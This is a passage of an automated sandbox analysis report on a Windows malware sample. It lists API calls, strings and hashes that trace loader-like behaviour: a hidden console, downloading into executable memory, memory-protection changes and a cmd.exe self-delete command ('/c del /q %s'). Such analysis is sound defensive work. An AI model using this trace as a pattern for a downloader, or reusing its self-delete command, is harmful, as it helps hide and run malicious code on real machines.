                                                              • InternetReadFile.WININET(00000000,?,00001000,?), ref: 005E338C
                                                              • InternetCloseHandle.WININET(00000000), ref: 005E33C6
                                                              • fpos.LIBCPMTD ref: 005E3458
                                                              • fpos.LIBCPMTD ref: 005E346D
                                                              • fpos.LIBCPMTD ref: 005E349D
                                                              • VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,0061479C,00000024,00000040), ref: 005E34A5
                                                              • fpos.LIBCPMTD ref: 005E34D5
                                                              • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 005E3504
                                                              • InternetCloseHandle.WININET(00000000), ref: 005E33D0
                                                                • Part of subcall function 005E7990: char_traits.LIBCPMTD ref: 005E79BD
                                                                • Part of subcall function 005E7990: char_traits.LIBCPMTD ref: 005E7B17
                                                                • Part of subcall function 005E7990: char_traits.LIBCPMTD ref: 005E7BFC
                                                                • Part of subcall function 005E38F0: fpos.LIBCPMTD ref: 005E399A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: Internettask$CloseHandlefpos$char_traits$OpenVirtual$AllocCreateDirectoryFileFreeReadSleep
                                                              • String ID: \Ga$error$error$error$error$error $loader
                                                              • API String ID: 3533587409-2945064087
                                                              • Opcode ID: 810d476ef6555c68260c7ae8d5114b9095d8994a57e12263b2222a7098064617
                                                              • Instruction ID: 464a98828c115ff6b03c4ca2905f3b30c0b38c5f87b7250ee3970ead1ea7230d
                                                              • Opcode Fuzzy Hash: 810d476ef6555c68260c7ae8d5114b9095d8994a57e12263b2222a7098064617
                                                              • Instruction Fuzzy Hash: 5C819471E4024AAADB08EBA1DC4AFEE7B39BF98700F104558F156B71C2DF745A44CBA1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000003.2552168143.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_3_5c90000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: # l^$3 l^$C l^$S l^$c l^$s l^
                                                              • API String ID: 0-4261818416
                                                              • Opcode ID: 41584a93b1bb9d4dec22d5f0156046f5a7d4eabbb3558dd950705e9667136e92
                                                              • Instruction ID: 8b2c57ddedec786973a9fca7732cbd8425cb3c99f00d508c7b1461d8865dc1fd
                                                              • Opcode Fuzzy Hash: 41584a93b1bb9d4dec22d5f0156046f5a7d4eabbb3558dd950705e9667136e92
                                                              • Instruction Fuzzy Hash: 909184B5B006186BDF19DFB484445AEB7F7EF84610B04C92DD58AAB340EF346A06CBD6

                                                              Control-flow Graph

                                                              APIs
                                                              • CreateDirectoryA.KERNEL32(C:\Program Files (x86)\Everything,00000000), ref: 005E2FF5
                                                                • Part of subcall function 005E2CB0: InternetOpenA.WININET(Mozilla/5.0,00000001,00000000,00000000,00000000), ref: 005E2CDB
                                                                • Part of subcall function 005E2CB0: InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,80000000,00000000), ref: 005E2D19
                                                                • Part of subcall function 005E2CB0: task.LIBCPMTD ref: 005E2D25
                                                                • Part of subcall function 005E2CB0: task.LIBCPMTD ref: 005E2D70
                                                                • Part of subcall function 005E2CB0: InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 005E2DAC
                                                                • Part of subcall function 005E2CB0: InternetCloseHandle.WININET(00000000), ref: 005E2DE6
                                                                • Part of subcall function 005E2CB0: InternetCloseHandle.WININET(00000000), ref: 005E2E02
                                                              • task.LIBCPMTD ref: 005E3037
                                                              • task.LIBCPMTD ref: 005E3046
                                                              • task.LIBCPMTD ref: 005E3087
                                                              • task.LIBCPMTD ref: 005E3096
                                                              • task.LIBCPMTD ref: 005E30E6
                                                              • task.LIBCPMTD ref: 005E30F8
                                                              • task.LIBCPMTD ref: 005E3148
                                                              • task.LIBCPMTD ref: 005E315A
                                                              • task.LIBCPMTD ref: 005E31AA
                                                              • task.LIBCPMTD ref: 005E31BC
                                                              • task.LIBCPMTD ref: 005E320C
                                                              • task.LIBCPMTD ref: 005E321E
                                                              Strings
                                                              • C:\Program Files (x86)\Everything, xrefs: 005E2FF0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: task$Internet$CloseHandleOpen$CreateDirectoryFileRead
                                                              • API String ID: 1727112427-2279345222
                                                              • Opcode ID: 45e9e4966a8631f48e1b5578ba36e8872980e05788f9fa7bd3420d0f6c8b7b7b
                                                              • Instruction ID: b91b07b060b21552b8c02390688a65565d4952658e799131f092f99beff31b79
                                                              • Opcode Fuzzy Hash: 45e9e4966a8631f48e1b5578ba36e8872980e05788f9fa7bd3420d0f6c8b7b7b
                                                              • Instruction Fuzzy Hash: C9518175C41289EACB18EBA0DE4ABDDBB34BF51304F9085D8E1556B1C2EB701B48CB91

                                                              Control-flow Graph

                                                              APIs
                                                              • GetCurrentProcess.KERNEL32(00000100), ref: 005E2F4E
                                                              • SetPriorityClass.KERNEL32(00000000), ref: 005E2F55
                                                              • GetCurrentThread.KERNEL32 ref: 005E2F5D
                                                              • SetThreadPriority.KERNEL32(00000000), ref: 005E2F64
                                                              • SHChangeNotify.SHELL32(00000004,00000001,?,00000000), ref: 005E2F78
                                                              • _fwprintf.LIBCONCRTD ref: 005E2F92
                                                                • Part of subcall function 005E1170: _fread.LIBCMTD ref: 005E118A
                                                              • ShellExecuteA.SHELL32(00000000,open,cmd.exe,?,00000000,00000000), ref: 005E2FB1
                                                              • ExitProcess.KERNEL32 ref: 005E2FB9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: CurrentPriorityProcessThread$ChangeClassExecuteExitNotifyShell_fread_fwprintf
                                                              • String ID: /c del /q %s$cmd.exe$open
                                                              • API String ID: 809167050-3932901086
                                                              • Opcode ID: eaa21a17b2d13cd67472ca8b626239ff273777123e139c63bbe5c7c64857c4bb
                                                              • Instruction ID: f0bd0e067f7c9a2a9ce4b3f5b76b4975c3f72bdc18d7fef03c8fb4680b8ef12c
                                                              • Opcode Fuzzy Hash: eaa21a17b2d13cd67472ca8b626239ff273777123e139c63bbe5c7c64857c4bb
                                                              • Instruction Fuzzy Hash: 7FF0FF71A84305BBE715BBE0AC4FFEA3A2BBB49B01F041458B7069A0D2DAF05584CB75

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 00605402: CreateFileW.KERNEL32(?,00000000,?,006057F2,?,?,00000000,?,006057F2,?,0000000C), ref: 0060541F
                                                              • GetLastError.KERNEL32 ref: 0060585D
                                                              • __dosmaperr.LIBCMT ref: 00605864
                                                              • GetFileType.KERNEL32(00000000), ref: 00605870
                                                              • GetLastError.KERNEL32 ref: 0060587A
                                                              • __dosmaperr.LIBCMT ref: 00605883
                                                              • CloseHandle.KERNEL32(00000000), ref: 006058A3
                                                              • CloseHandle.KERNEL32(005FBAD5), ref: 006059F0
                                                              • GetLastError.KERNEL32 ref: 00605A22
                                                              • __dosmaperr.LIBCMT ref: 00605A29
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                              • String ID: H
                                                              • API String ID: 4237864984-2852464175
                                                              • Opcode ID: bf26d239b0922bd430d61737ac80516e1976829363f31ae899ce0b6a451e28a9
                                                              • Instruction ID: f9dd4a34a88ecf231bd99acb734a332d1c0030f128f7d7185b2e039dcc5c8d98
                                                              • Opcode Fuzzy Hash: bf26d239b0922bd430d61737ac80516e1976829363f31ae899ce0b6a451e28a9
                                                              • Instruction Fuzzy Hash: D1A12432A545599FCF1D9F68DC95BEF3BA2AB46320F18015EF8029B3D1DB358812CB61

                                                              Control-flow Graph

                                                              APIs
                                                              • InternetOpenA.WININET(Mozilla/5.0,00000001,00000000,00000000,00000000), ref: 005E2CDB
                                                                • Part of subcall function 005E2B40: task.LIBCPMTD ref: 005E2C92
                                                              • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,80000000,00000000), ref: 005E2D19
                                                              • task.LIBCPMTD ref: 005E2D25
                                                              • task.LIBCPMTD ref: 005E2D70
                                                              • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 005E2DAC
                                                              • InternetCloseHandle.WININET(00000000), ref: 005E2DE6
                                                              • InternetCloseHandle.WININET(00000000), ref: 005E2E02
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: Internet$task$CloseHandleOpen$FileRead
                                                              • String ID: Mozilla/5.0
                                                              • API String ID: 3809162015-2630049532
                                                              • Opcode ID: 2bd23526780c99bca46a6cb749cbe79114de8cee59cb0a16eddd28031e2fbf93
                                                              • Instruction ID: e528b8be8583ebc9afd6e051ede0b092fa85ff37dc926bf0aea038a6dbcae4c4
                                                              • Opcode Fuzzy Hash: 2bd23526780c99bca46a6cb749cbe79114de8cee59cb0a16eddd28031e2fbf93
                                                              • Instruction Fuzzy Hash: 3D41AFB1A4024AABDB18DF90CD8ABEFBB79BB44300F104258F241772D0DBB45A44CFA0

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: char_traits
                                                              • String ID:
                                                              • API String ID: 1158913984-3916222277
                                                              • Opcode ID: e0141cd5b8471f13d3669d370f0f29927affb7cc6185455ab20bd4ddeca3f86a
                                                              • Instruction ID: a2b873a63f8797cabe4200fcd8be37758c6d2264db9dab8152a1aa2816a5fe9a
                                                              • Opcode Fuzzy Hash: e0141cd5b8471f13d3669d370f0f29927affb7cc6185455ab20bd4ddeca3f86a
                                                              • Instruction Fuzzy Hash: 7251A0B5D00199AFCF1CEB96C4459FE7FB9BF95340F048499E581AB241EB309A44CFA1

                                                              Control-flow Graph

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 18fe7aa66148513a4e948ec4a1d9ea089648c0061e32f9af672f7b01b8047a0d
                                                              • Instruction ID: 0d2391b079288554b7cdf35fe3d6beffd9689a5e036b197532f715c96c8c60c7
                                                              • Opcode Fuzzy Hash: 18fe7aa66148513a4e948ec4a1d9ea089648c0061e32f9af672f7b01b8047a0d
                                                              • Instruction Fuzzy Hash: BFB1D1F0A0424E9FDB119FA8D844BBE7FBABB49310F144159E7089B292D7789941CB63
                                                              APIs
                                                                • Part of subcall function 036C98D2: LoadLibraryA.KERNEL32(00000000,?,?), ref: 036C9964
                                                              • VirtualProtect.KERNEL32(00000000,0000000C,00000040,?), ref: 036C770F
                                                              • VirtualProtect.KERNEL32(00000000,0000000C,?,?), ref: 036C7742
                                                              • VirtualProtect.KERNEL32(00000000,0040145E,00000040,?), ref: 036C7775
                                                              • VirtualProtect.KERNEL32(00000000,0040145E,?,?), ref: 036C779F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000003.2552254239.00000000036C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_3_36c0000_LisectAVT_2403002B_185.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ProtectVirtual$LibraryLoad
                                                              • String ID:
                                                              • API String ID: 895956442-0
                                                              • Opcode ID: 5abde9ea6318855c5243acd77b08285013fe7b3e318e0c860c6c3d549a2b56cb
                                                              • Instruction ID: 00e1e16817c6228c945ab7b9b52c1b59b6b657766bf3d54f460107250cd867a7
                                                              • Opcode Fuzzy Hash: 5abde9ea6318855c5243acd77b08285013fe7b3e318e0c860c6c3d549a2b56cb
                                                              • Instruction Fuzzy Hash: 1B21D6762143897FF310EA618C88FB7B6DCDB85314F08083EFA46D6151EB69E9058BB5

                                                              Control-flow Graph

                                                              APIs
                                                              • GetConsoleWindow.KERNEL32 ref: 005E35A4
                                                              • ShowWindow.USER32(?,00000000), ref: 005E35B3
                                                              • Sleep.KERNEL32(00000BB8), ref: 005E35C3
                                                                • Part of subcall function 005E3240: Sleep.KERNEL32(00000BB8,?,00608613,000000FF), ref: 005E326C
                                                                • Part of subcall function 005E3240: InternetOpenA.WININET(loader,00000001,00000000,00000000,00000000), ref: 005E328D
                                                                • Part of subcall function 005E3240: InternetOpenUrlA.WININET(00000000,\Ga,00000000,00000000,80000000,00000000), ref: 005E32CD
                                                                • Part of subcall function 005E3240: InternetCloseHandle.WININET(?), ref: 005E32FE
                                                                • Part of subcall function 005E3240: InternetCloseHandle.WININET(?), ref: 005E3361
                                                                • Part of subcall function 005E3240: InternetCloseHandle.WININET(?), ref: 005E336B
                                                                • Part of subcall function 005E3240: InternetReadFile.WININET(00000000,?,00001000,?), ref: 005E338C
                                                              • Sleep.KERNEL32(00000BB8), ref: 005E35D3
                                                                • Part of subcall function 005E2F40: GetCurrentProcess.KERNEL32(00000100), ref: 005E2F4E
                                                                • Part of subcall function 005E2F40: SetPriorityClass.KERNEL32(00000000), ref: 005E2F55
                                                                • Part of subcall function 005E2F40: GetCurrentThread.KERNEL32 ref: 005E2F5D
                                                                • Part of subcall function 005E2F40: SetThreadPriority.KERNEL32(00000000), ref: 005E2F64
                                                                • Part of subcall function 005E2F40: SHChangeNotify.SHELL32(00000004,00000001,?,00000000), ref: 005E2F78
                                                                • Part of subcall function 005E2F40: _fwprintf.LIBCONCRTD ref: 005E2F92
                                                                • Part of subcall function 005E2F40: ShellExecuteA.SHELL32(00000000,open,cmd.exe,?,00000000,00000000), ref: 005E2FB1
                                                                • Part of subcall function 005E2F40: ExitProcess.KERNEL32 ref: 005E2FB9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: Internet$CloseHandleSleep$CurrentOpenPriorityProcessThreadWindow$ChangeClassConsoleExecuteExitFileNotifyReadShellShow_fwprintf
                                                              • String ID:
                                                              • API String ID: 96696892-0
                                                              • Opcode ID: ebc7f4de00e22f2004a7b01109c2ffca56d50be6c63f9257aaeaeb752533b284
                                                              • Instruction ID: f2aea963b4801a0ebc18fe2b5e515e48c5e79b24510363ecb0247e16dc1efe87
                                                              • Opcode Fuzzy Hash: ebc7f4de00e22f2004a7b01109c2ffca56d50be6c63f9257aaeaeb752533b284
                                                              • Instruction Fuzzy Hash: B3E08630580209ABC304BBB6DD0F61E7AAEAB40705F000094F602961B2CEB15D008671
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(00000000,?,?), ref: 036C9964
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000003.2552254239.00000000036C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_3_36c0000_LisectAVT_2403002B_185.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID: .$.dll
                                                              • API String ID: 1029625771-979041800
                                                              • Opcode ID: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
                                                              • Instruction ID: e72d017d8f53049a83265c3560056f7a9f3da94694e0d1f251de944cb33276b9
                                                              • Opcode Fuzzy Hash: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
                                                              • Instruction Fuzzy Hash: 442190356143C59FEB21CFA8C984A7ABBE8EF05724F1C41ADD9559BB41D720E845C780

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: char_traits
                                                              • String ID:
                                                              • API String ID: 1158913984-0
                                                              • Opcode ID: f79c588d6efda3a3ebcdbc96ac884d84fc1e81f3fde1009356bcb787f61f1219
                                                              • Instruction ID: a12a2ae40de49357e4247cbe8cd75d778e9a21d2dc926772c503f2f3c30688b5
                                                              • Opcode Fuzzy Hash: f79c588d6efda3a3ebcdbc96ac884d84fc1e81f3fde1009356bcb787f61f1219
                                                              • Instruction Fuzzy Hash: 44B1F874D04289DFCB18DF95C495AADBFB5FF88344F248129E589AB355DB30A941CF80

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: __fread_nolock$Min_value
                                                              • String ID:
                                                              • API String ID: 3100174245-0
                                                              • Opcode ID: 8371f13d69e443bdbdbb54f4938de538dee45e7015f964985af737612c5b5777
                                                              • Instruction ID: a7c677dfde5a4c37052497a2b2d5074d090725538c3441d340a5c4e11223a9df
                                                              • Opcode Fuzzy Hash: 8371f13d69e443bdbdbb54f4938de538dee45e7015f964985af737612c5b5777
                                                              • Instruction Fuzzy Hash: 7251FA75E00149EFCB08DF99C888AAEBBB1BF88304F108569E555AB341D735AE45DF90

                                                              Control-flow Graph

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: =^
                                                              • API String ID: 0-34250961
                                                              • Opcode ID: e6334f29c034c610681e9646df5c21512a5e39889c8c332a0189f8a5d171783f
                                                              • Instruction ID: 6580cc028181d82c436ae2cdd4e02ef7df90a7c90f85731a1287fc34c978ef7f
                                                              • Opcode Fuzzy Hash: e6334f29c034c610681e9646df5c21512a5e39889c8c332a0189f8a5d171783f
                                                              • Instruction Fuzzy Hash: D25193B0A00208AFDB14CF58CC85EBA7FB5FB89364F298558E9095B252D3759E41CB92

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: task
                                                              • String ID: @
                                                              • API String ID: 1384045349-2766056989
                                                              • Opcode ID: 00f9e9671148ac63dde79941a7c1af2288c368fb78e8eea4485058baf08f0801
                                                              • Instruction ID: 87d8c2072a839f10ea064c82adf24af6fd06ba93605bd04f5062f7946175a9cd
                                                              • Opcode Fuzzy Hash: 00f9e9671148ac63dde79941a7c1af2288c368fb78e8eea4485058baf08f0801
                                                              • Instruction Fuzzy Hash: B8411B71C0058ADFCB08DF95D955AEEBBB4FF48714F208259E4A27B395DB346A04CBA0

                                                              Control-flow Graph

                                                              APIs
                                                              • Concurrency::cancellation_token_source::~cancellation_token_source.LIBCPMTD ref: 005E7D8A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: Concurrency::cancellation_token_source::~cancellation_token_source
                                                              • String ID: Z6^
                                                              • API String ID: 2028376226-2611322866
                                                              • Opcode ID: 7b0863fe271b2676b55226f38b59cbe4313528dc3f18fbfb97a9f1e582d96fcc
                                                              • Instruction ID: b8c34191347051b9548fdf5717bc69265f8fa4db25007b95bc9ec9b135a156b4
                                                              • Opcode Fuzzy Hash: 7b0863fe271b2676b55226f38b59cbe4313528dc3f18fbfb97a9f1e582d96fcc
                                                              • Instruction Fuzzy Hash: 92110AB1D0024AEFCB08DF98C995BEEBBB5FB48710F108259E559A7380DB345A41CFA0

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 005F6A2B: GetConsoleOutputCP.KERNEL32(9EDA4073,00000000,00000000,?), ref: 005F6A8E
                                                              • WriteFile.KERNEL32(?,00000000,005F112F,?,00000000,00000000,00000000,?,00000000,?,005E97B5,005F112F,00000000,005E97B5,?,?), ref: 005F749A
                                                              • GetLastError.KERNEL32(?,005F112F,00000000,?,005E97B5,?,00000000,00000000), ref: 005F74A4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: ConsoleErrorFileLastOutputWrite
                                                              • String ID:
                                                              • API String ID: 2915228174-0
                                                              • Opcode ID: 285e2fa210f2a6aa5567f781cc5da2455ca02d6652a44a19b04f6b16d86f0948
                                                              • Instruction ID: 1247c3e259e552eb05b57b607e78978bfc40d57f56e019ecdff5af7d341cf21e
                                                              • Opcode Fuzzy Hash: 285e2fa210f2a6aa5567f781cc5da2455ca02d6652a44a19b04f6b16d86f0948
                                                              • Instruction Fuzzy Hash: 6B618E7190811EABDF11DFA8C888EFEBFBABF49304F144549EA04A7252D379D911DB60

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 005E73B0: _Max_value.LIBCPMTD ref: 005E73DC
                                                                • Part of subcall function 005E73B0: _Min_value.LIBCPMTD ref: 005E7402
                                                              • allocator.LIBCONCRTD ref: 005E7FC3
                                                              • allocator.LIBCONCRTD ref: 005E8032
                                                                • Part of subcall function 005E1550: std::_Xinvalid_argument.LIBCPMT ref: 005E1558
                                                              Memory Dump Source
